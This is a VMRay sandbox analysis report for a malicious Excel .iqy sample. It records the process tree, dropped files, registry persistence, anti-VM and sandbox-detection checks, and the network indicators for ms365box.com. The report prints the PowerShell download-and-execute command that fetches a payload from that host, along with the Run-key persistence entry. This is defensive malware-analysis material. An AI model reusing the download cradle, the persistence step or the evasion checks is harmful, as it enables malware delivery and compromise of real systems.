VMRay Analyzer Report for Sample #206024
VMRay Analyzer 2.4.0

Name resolution
  URI ms365box.com   Resolved_To   Address 31.202.128.249
  URI localhost      Resolved_To   Address 0000:0000:0000:0000:0000:0000:0000:0001
  URI localhost      Resolved_To   Address 127.0.0.1
Process tree

Process 1: excel.exe (PID 2476, parent PID 1664)
  Command line:      "C:\Program Files\Microsoft Office\Office15\EXCEL.EXE"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path:        c:\program files\microsoft office\office15\excel.exe

Process 2: cmd.exe (PID 3040, parent PID 2476, child of Process 1)
  Command line:      CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring("http://ms365box.com/update.2"))
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path:        c:\windows\system32\cmd.exe

Process 3: powershell.exe (PID 3064, parent PID 3040, child of Process 2)
  Command line:      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring("http://ms365box.com/update.2"))
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path:        c:\windows\system32\windowspowershell\v1.0\powershell.exe

Process 4: total.exe (PID 1224, parent PID 3064, child of Process 3)
  Command line:      "C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path:        c:\users\adu0vk~1\appdata\local\temp\total.exe

Process 5: a.exe (PID 1108, parent PID 1224, child of Process 4)
  Command line:      A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa
  Working directory: C:\Users\ADU0VK~1\AppData\Local\Temp\
  Image path:        c:\users\adu0vk~1\appdata\local\temp\a.exe

Process 6: cmd.exe (PID 2192, parent PID 1224, child of Process 4)
  Command line:      cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"
  Working directory: C:\Users\ADU0VK~1\AppData\Local\Temp\
  Image path:        c:\windows\syswow64\cmd.exe

Process 7: winpoint.exe (PID 2160, parent PID 2192, child of Process 6)
  Command line:      "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"
  Working directory: C:\Users\ADU0VK~1\AppData\Local\Temp\
  Image path:        c:\users\adu0vk iwa5kls\appdata\roaming\winpoint.exe

Process 8: cmd.exe (PID 204, parent PID 1224, child of Process 4)
  Command line:      cmd /c C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat
  Working directory: C:\Users\ADU0VK~1\AppData\Local\Temp\
  Image path:        c:\windows\syswow64\cmd.exe

Process 9: ping.exe (PID 1836, parent PID 204, child of Process 8)
  Command line:      ping localhost -n 2
  Working directory: C:\Users\ADU0VK~1\AppData\Local\Temp\
  Image path:        c:\windows\syswow64\ping.exe
Artifacts

Files
  Standard handles and devices:
    STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, conout$, \device\null
  PowerShell and .NET configuration files:
    c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml (ps1xml)
    c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml (ps1xml)
    c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml (ps1xml)
    c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml (ps1xml)
    c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config (config)
  Temporary-directory files:
    c:\users\adu0vk~1\appdata\local\temp\nsdfd9f.tmp (tmp)
    c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp (tmp)
    c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\nsexec.dll (dll)
    c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll (dll)
    c:\users\adu0vk~1\appdata\local\temp\total.exe (exe)
    c:\users\adu0vk~1\appdata\local\temp\1.bat (bat)
    c:\users\adu0vk~1\appdata\local\temp\*(jigfodhy8t9ij3g89eiw
  Directories:
    c:\users
    c:\users\adu0vk~1
    c:\users\adu0vk~1\appdata
    c:\users\adu0vk~1\appdata\local
    c:\users\adu0vk~1\appdata\local\temp

Mutexes
  Global\.net clr networking
  Name

Registry keys (hive\key: values accessed)
  HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
  HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun
  HKEY_CURRENT_USER\Software\Microsoft\Command Processor: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell: path, ApplicationBase, StackVersion
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine: ApplicationBase
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell: path
  HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment: PSMODULEPATH
  HKEY_CURRENT_USER\Environment: PSMODULEPATH
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN: StackVersion
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog and its subkeys Application, Application\PowerShell, HardwareEvents, HardwareEvents\PowerShell, Internet Explorer, Internet Explorer\PowerShell, Key Management Service, Key Management Service\PowerShell, Media Center, Media Center\PowerShell, OAlerts, OAlerts\PowerShell, Security, System, System\PowerShell, Windows PowerShell, Windows PowerShell\PowerShell
  Keys recorded with hive INVALID: System, System\PowerShell, Windows PowerShell, Windows PowerShell\PowerShell
  HKEY_CURRENT_USER (root key)
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: Restore = "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" (REG_SZ)
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SysTracer
  HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS: SystemProductName
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000: Device Description
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum: 0
  HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters: DefaultTTL

Network
  DNSRecord: ms365box.com
  DNSRecord: localhost
  SocketAddress: ms365box.com, port 80
  NetworkConnection: HTTP to ms365box.com, port 80
  URI: ms365box.com/update.2
  URI: ms365box.com/inv
Analyzed Sample #206024 (Malware Artifacts)
  Sample-ID: #206024
  Job-ID:    #274092
  This sample was analyzed by VMRay Analyzer 2.4.0 on a Windows 7 system.
  VTI Score: 100 (VTI Score based on VTI Database Version 3.0)

Metadata of Sample File #206024
  Submission-ID: #294060
  File name:     76917b219ad5a1ff8229a75eb23c34a9ad1ce98264257d3cca538ac59c49a15f.iqy
  File type:     iqy
  MD5:           8292efeed21c16d4833e2933a41fab82
  SHA1:          4ae82c4536463c25b31736503308b32f5a42ff59
  SHA256:        76917b219ad5a1ff8229a75eb23c34a9ad1ce98264257d3cca538ac59c49a15f
  Relation:      Opened_By

Metadata of Analysis for Job-ID #274092
  Analysis VM:           win7_64_sp1-mso2013
  Operating system:      Windows 7, 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa), x86 64-bit
  User name in the VM:   aDU0VK IWA5kLS
  Other recorded values: Timeout, AUFDDCNTXWT, AUFDDCNTXWT, False, True, 263.948
  This is a property collection for additional information of VMRay analysis (VMRay Analyzer).
VTI rule matches (category | VTI rule score | rule | classification)

Process | 4/5 | vmray_document_create_process | Creates process
  Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".

Network | 3/5 | vmray_request_dns_by_name | Performs DNS request
  Resolves host name "ms365box.com".

Process | 4/5 | vmray_document_create_process | Creates process
  Creates process "C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe".

Process | 1/5 | vmray_install_ipc_endpoint | Creates system object
  Creates mutex with name "Global\.net clr networking".

Process | 1/5 | vmray_install_ipc_endpoint | Creates system object
  Creates mutex with name "Name".

Anti Analysis | 2/5 | vmray_detect_debugger_by_api | Tries to detect debugger
  Check via API "IsDebuggerPresent".

Anti Analysis | 5/5 | vmray_detect_generic_vm_by_registry | Tries to detect virtual machine
  Reads out system information, commonly used to detect VMs via registry. (Value "SystemProductName" in key "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS").

Anti Analysis | 5/5 | vmray_detect_vmware_by_registry | Tries to detect virtual machine
  Possibly trying to detect VMware via registry "HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools".

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "Threadexpert" by checking for existence of module "dbghelp.dll".

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "pstorec.dll".

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "Virtual PC" by checking for existence of module "vmcheck.dll".

Anti Analysis | 5/5 | vmray_detect_forensic_tool_by_module | Tries to detect a forensic tool
  Tries to detect forensic tools by checking if the DLL "SunBelt Sandbox" exists.

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "api_log.dll".

Anti Analysis | 5/5 | vmray_detect_forensic_tool_by_module | Tries to detect a forensic tool
  Tries to detect forensic tools by checking if the DLL "Winsock Packet Editor" exists.

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll".

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "dir_watch.dll".

Anti Analysis | 5/5 | vmray_detect_application_sandbox_by_dll | Tries to detect application sandbox
  Possibly trying to detect "Comodo Sandbox" by checking for existence of module "cmdvrt32.dll".

Anti Analysis | 5/5 | vmray_detect_virtualbox_by_module | Tries to detect virtual machine
  Possibly trying to detect VirtualBox via module "VBoxHook.dll".

Process | 4/5 | vmray_document_create_process | Creates process
  Creates process: A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa

Persistence | 3/5 | vmray_install_startup_script_by_registry | Installs system startup script or application
  Adds "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" to Windows startup via registry.

Process | 4/5 | vmray_document_create_process | Creates process
  Creates process: cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"

Process | 4/5 | vmray_document_create_process | Creates process
  Creates process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".

Network | 3/5 | vmray_request_dns_by_name | Performs DNS request
  Resolves host name "localhost".

File System | 4/5 | vmray_handle_with_malicious_files | Known malicious file
  File "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe" is a known malicious file.

File System | 4/5 | vmray_handle_with_malicious_files | Known malicious file
  File "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" is a known malicious file.

Network | 2/5 | vmray_reputation_url_malicious | Associated with known malicious/suspicious URLs
  URL "http://ms365box.com/update.2" is known as malicious URL.

Network | 2/5 | vmray_reputation_url_malicious | Associated with known malicious/suspicious URLs
  URL "http://ms365box.com/inv" is known as malicious URL.

Network | 2/5 | vmray_reputation_url_malicious | Associated with known malicious/suspicious URLs
  URL "ms365box.com" is known as malicious URL.

Network | 2/5 | vmray_reputation_url_malicious | Associated with known malicious/suspicious URLs
  URL "http://ms365box.com/" is known as malicious URL.

Network | 2/5 | vmray_reputation_url_malicious | Associated with known malicious/suspicious URLs
  URL "http://ms365box.com/update.1" is known as malicious URL.

Network | 4/5 | vmray_download_data_http_request | Downloads data
  URL "http://ms365box.com/update.2".

Network | 4/5 | vmray_download_data_http_request | Downloads data
  URL "http://ms365box.com/inv".

Network | 2/5 | establish_http_connection | Connects to HTTP server
  URL "ms365box.com/update.2".

Network | 2/5 | establish_http_connection | Connects to HTTP server
  URL "ms365box.com/inv".

PE | 1/5 | vmray_check_for_packed_pe_file | The PE file was created with a packer
  File "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" is packed with "Armadillo v1.71".

PE | 2/5 | vmray_drop_pe_file | Drops PE file
  Drops file "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe".

PE | 2/5 | vmray_drop_pe_file | Drops PE file
  Drops file "C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll".

PE | 2/5 | vmray_drop_pe_file | Drops PE file
  Drops file "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".

PE | 3/5 | vmray_execute_dropped_pe_file | Executes dropped PE file
  Executes dropped file "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe".

PE | 3/5 | vmray_execute_dropped_pe_file | Executes dropped PE file
  Executes dropped file "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".